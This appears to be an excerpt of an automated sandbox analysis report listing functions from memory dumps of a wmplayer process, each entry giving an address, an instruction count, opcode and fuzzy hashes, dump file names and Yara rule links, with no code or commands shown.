Opcode Fuzzy Hash: 72a756b15f809604534df994d08c8b6419c01da83ed65c087d09d7abbce2b353
Instruction Fuzzy Hash: C2216D75A00209DFCB14CF98C581AAEBBB5FB89718F2441ADE105AB310CB71AD0ACBD0

Function 03829240 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dddef751bc580b5bfc764d47fbae14a9ec067067031c16aa69471d7a39e4aaa
Instruction ID: b6bcc9264ec5a7df5f4793a8720d1c923db8c270c8468f7d5765f1129862231f
Opcode Fuzzy Hash: 1dddef751bc580b5bfc764d47fbae14a9ec067067031c16aa69471d7a39e4aaa
Instruction Fuzzy Hash: 5A11E23E015A44EAD731FFAAD841A627BA8EBA4A80F144065E804DFA58E378DD01CB65

Function 038527ED Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66f4811d3000e578467c1cff5cb2d9017e93e5a17e7fbcfdfcb850d15257fb77
Instruction ID: 5cefb8427af4d20012cfed908c011079010a7922d467b89ab65adb526cfe2aa7
Opcode Fuzzy Hash: 66f4811d3000e578467c1cff5cb2d9017e93e5a17e7fbcfdfcb850d15257fb77
Instruction Fuzzy Hash: 6301C475605648ABE72AE2ED9C84F67A69CEF81399F1D04E5F801DB650DA58DC00C2A2

Function 0385B052 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2c59494ea2de9f7254737f3227616e402913c3f0a19b9f35358fed10b11c4e3
Instruction ID: f23ab60dcb2e7cab59762d402f156db1bdedac1e44977b19fce0b1ab010bc97a
Opcode Fuzzy Hash: e2c59494ea2de9f7254737f3227616e402913c3f0a19b9f35358fed10b11c4e3
Instruction Fuzzy Hash: 0C01D676B04744ABD712EBED9C81F6BBAE9DF94214F0400A9FA05C7141EA70ED00C622

Function 03827330 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a202816e7df9526ea31abc278bb0b67cfe27cf60dffb628e66fcb1e713c464d
Instruction ID: b00e25f57fa23a47eebac1989bf80a485d63acf886e9fd760957ef46912f979b
Opcode Fuzzy Hash: 4a202816e7df9526ea31abc278bb0b67cfe27cf60dffb628e66fcb1e713c464d
Instruction Fuzzy Hash: EF119E716007249FD721CFAAC845F6B7BE8EB84304F0544A9FE85CB211D735E840CBA1

Function 0385F2D0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe46cc35aa5f9ae521c33f103d0534ea7d97d2b8f9674c427fa131d3814b4a6b
Instruction ID: 18d6f80857b4e326c4fbc263694733868e512f4cbc7dc1ae7a95cb0ff6fed1f9
Opcode Fuzzy Hash: fe46cc35aa5f9ae521c33f103d0534ea7d97d2b8f9674c427fa131d3814b4a6b
Instruction Fuzzy Hash: 7811C275600B48DBD720DFA9C844BAEB7A8FF94700F1804E6E905EB641D679D901C751

Function 038C72A0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
Instruction ID: 1a358945969e191f34c0d988028a0e330ede91b3b142eb89a0ea08b391528a45
Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
Instruction Fuzzy Hash: 8F01D27A240609BFD711EFAACC80E62F76EFF84390F444969F10486560C731ECA0CAA5

Function 0382A250 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
Instruction ID: 64a6e1f30e7a97baf427f9ad5e69d7cb551f830ccfdaf572e08e68c8144dfb6a
Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
Instruction Fuzzy Hash: E70126714047259BCB34CFA5D840A36BFAAEF45B6070489ADFC95CB680CB39D460CB60

Function 03836259 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dd1d0fa1a9aa5d4caf740b235fd92e1ac292850a2b8bd13adcd6202bd349b7a
Instruction ID: 3d584899706372b78f1cd7dce37d288f8929740d9f58c10f1012ae60c9b9689b
Opcode Fuzzy Hash: 3dd1d0fa1a9aa5d4caf740b235fd92e1ac292850a2b8bd13adcd6202bd349b7a
Instruction Fuzzy Hash: 3A11A074501318ABDB25EBA8CC41FE8B379EF04710F5045D4A314EA1E0DB709E81CF85

Function 038AE1D0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d7b1225ee433489396c2ed130aca087e6c849333bd72a8f88db2069b554d661
Instruction ID: 0e01c081f6280c4418efc3fb3e5bd8dbaeaa2551d9cf85d7d80b495691431009
Opcode Fuzzy Hash: 0d7b1225ee433489396c2ed130aca087e6c849333bd72a8f88db2069b554d661
Instruction Fuzzy Hash: B4117936241740EFDB16EF98C980F16BBB8FF48B44F2404A5F905DB6A1D635ED01CA90

Function 0383208A Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
Instruction ID: f9453fb072149e3a298bafbca47da7bb45e410eecb5ce9a7dfe5a52fcd04f3f8
Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
Instruction Fuzzy Hash: 0F0124322002108BDF10EBA9D890BA6B76ABFC5700F1949E5EE01CF345EAB1CC85C7D0

Function 038720F0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 417386d30ee7ba53f11408b79ab5936ca2772f78bad4fd5e3564a5787498bae9
Instruction ID: 75edad73738d6990c1dc227ca6bfed774ad67aefdfc7a05a5f5b6091ec7fadf1
Opcode Fuzzy Hash: 417386d30ee7ba53f11408b79ab5936ca2772f78bad4fd5e3564a5787498bae9
Instruction Fuzzy Hash: 19116D35A0120CEBDB05EFA8C850FAE7BBAFB44244F004099E906DB250D635EE11CB91

Function 0382C020 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
Instruction ID: 52e62174f243e457d77d5723e4d44d336e54c8b9dde83c3d4ab1e2c61265efb5
Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
Instruction Fuzzy Hash: 1901B5361007489FDB22E7AAD800ABBB7E9FFC4654F08449AA946CB580DA74E446CB51

Function 03829353 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
Instruction ID: 898ad8ed6d692b53b56d4591d75fc13cd162a04a797f9ac61fdd2d4d820d1758
Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
Instruction Fuzzy Hash: 77118E32500B11DFD721DF95C884F22B7E4BF80766F1988ACD4898A5A5C374E890CB10

Function 038533A5 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
Instruction ID: 2d227677e4a949bcba2bd9fdcb52a4c67d376185897dfa21281a015fe0699022
Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
Instruction Fuzzy Hash: D001863A700205A7CB12DADEDD00F9FBA6C9F94681B1544A9BD15DB160EA70DA01C760

Function 0386D1D0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
Instruction ID: e8bb8f9f6b291edd4a5b00685aac97dfb23511d40e7dc433045e46a61223be4c
Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
Instruction Fuzzy Hash: 3901D47AB01648DBD711DAE8E801F65B3A9ABC4624F1481D5FA26CF380DB74E905C791

Function 0382826B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fb149136edb9a52abf22e35c5f271194a583892036c5671aa6f312ccac4ef1c
Instruction ID: 7263a73830dae6f78a2582caa3b365e12c3ee045163282bda2bd1702c0fe42df
Opcode Fuzzy Hash: 7fb149136edb9a52abf22e35c5f271194a583892036c5671aa6f312ccac4ef1c
Instruction Fuzzy Hash: 0201F735700A18DFCB14EBF9DC149AEBBB9EF84210F1940E99902EF640EE30DD41C6A1

Function 0384E016 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
Instruction ID: 11027540bb10607d3669843c2b857c968a7747b24058b5db3437c855e9fcc3d7
Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
Instruction Fuzzy Hash: 1F015A722006889FD322D79DC948F36B7ECFB85754F0D04E2E815CBA91D768EC40C621

Function 038EF367 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e337124a151b08cfea9fe81adcf17bd34289af846ab48b817b6d001b1f841f89
Instruction ID: 257dd4f4d73b4d2bc410d53b9cd10f01199d16b70803c343e5fc5d096f426eb6
Opcode Fuzzy Hash: e337124a151b08cfea9fe81adcf17bd34289af846ab48b817b6d001b1f841f89
Instruction Fuzzy Hash: 7C017C75A10358ABDB10EBE9D805FAEBBB8EF84700F0440A6A500EB280D6B4D900C7A5

Function 0382C310 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
Instruction ID: 0b1f3a4e174359e6db7e511f77e6f2ee85ff3bd97ef0a874183762ea906ab57e
Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
Instruction Fuzzy Hash: 62F04C372447329BC732D6DD4884F7FADB58FC5AA4F1900B5E109DF200CA648C4192D1

Function 03905152 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 246a773f1db98ba280226daadf85c7268bce2af37866d501b109f9653f06a9ee
Instruction ID: 5e23e773f760dc0ceaae73d371b3d36cdce053de3685ec2c2dafa59e0dacebd0
Opcode Fuzzy Hash: 246a773f1db98ba280226daadf85c7268bce2af37866d501b109f9653f06a9ee
Instruction Fuzzy Hash: 3F012C75A1020DAFDB00DFA9D941AEEBBF8FF49300F14405AE904FB380D674EA018BA1

Function 039050D9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 155f7a2ce994a8b40b68515c562834df5be29127a0037f2b351973bd89d24084
Instruction ID: b8dac4dd90754a9b01353871c46b71a4373d09b311690226ddca7e6285a90ec3
Opcode Fuzzy Hash: 155f7a2ce994a8b40b68515c562834df5be29127a0037f2b351973bd89d24084
Instruction Fuzzy Hash: 9E011AB5A00209AFDB00DFA9D941AAEB7B8EF49344F54405AE504FB280D674E9018BA1

Function 03905060 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33be8875524c6ed0dff03e556365f18b43421474942bc77df7f47db9fdb07b41
Instruction ID: bfaf13eb2ebfadf28984fa2d73ccb74490f52bd4b2b3fba54c434aa23b8f61fa
Opcode Fuzzy Hash: 33be8875524c6ed0dff03e556365f18b43421474942bc77df7f47db9fdb07b41
Instruction Fuzzy Hash: 4E015A75A00209AFCB00EFA9D941AAEB7B8EF48300F10405AE904EB381D674EA018BA1

Function 0385C073 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
Instruction ID: c6cb39affcd8a52afe491d59e4b0df5159c1b9148d300b37978d95ba03245b83
Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
Instruction Fuzzy Hash: 9CF0C2B3600614ABD324CF8DDC40E57FBFADBC0A80F088168E905CB220EA31DD04CB90

Function 038EF78A Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d788facf7bf7f9fc3fb240d136ad1b0d161697bdc3f534dc3a8e6d6ad1b74213
Instruction ID: adc10705f3392c4cbb523ad08529d9e0e8761c95af5390a976b5ac8a9cba885c
Opcode Fuzzy Hash: d788facf7bf7f9fc3fb240d136ad1b0d161697bdc3f534dc3a8e6d6ad1b74213
Instruction Fuzzy Hash: F4010CB5E0074DAFCB04DFE9D545AAEBBF4EF48304F1080AAA955EB341E674DA00DB91

Function 038EF2F8 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a13ad8f3cc0a448f260e25fd485991483baa44de075567051e844a5659dc9d68
Instruction ID: a0b8e872d4dee0b8baf5d719cf44393ceb215648917a5e201eedf3b1e18a22fe
Opcode Fuzzy Hash: a13ad8f3cc0a448f260e25fd485991483baa44de075567051e844a5659dc9d68
Instruction Fuzzy Hash: CBF0C876B10348ABDB04DFFDC805AEEB7B8EF44710F008096E501FB280DAB4D9018792

Function 039061E5 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c498d5d1fa49c9820167b68c11864f668dd4e776be9d8d5a4d1c42e172b267ec
Instruction ID: b17ad0ee4a4d1713b018de4e20155c2d12bea5f02d7c52d068076c90ce0dea34
Opcode Fuzzy Hash: c498d5d1fa49c9820167b68c11864f668dd4e776be9d8d5a4d1c42e172b267ec
Instruction Fuzzy Hash: D6018F71A00258DFCB00DFA9D841AEEB7F8EF48310F14005AE500EB280D778EA01CB95

Function 0386724D Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
Instruction ID: e5d1f09012d66fa4313cf92b08ec2fdf5c90daa5caa490627033a17b6026e4e4
Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
Instruction Fuzzy Hash: 98F06275A11359ABEB14D7FA8940FABBBA99F84618F0885E5B903DB344DA30E940C7D0

Function 039053FC Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

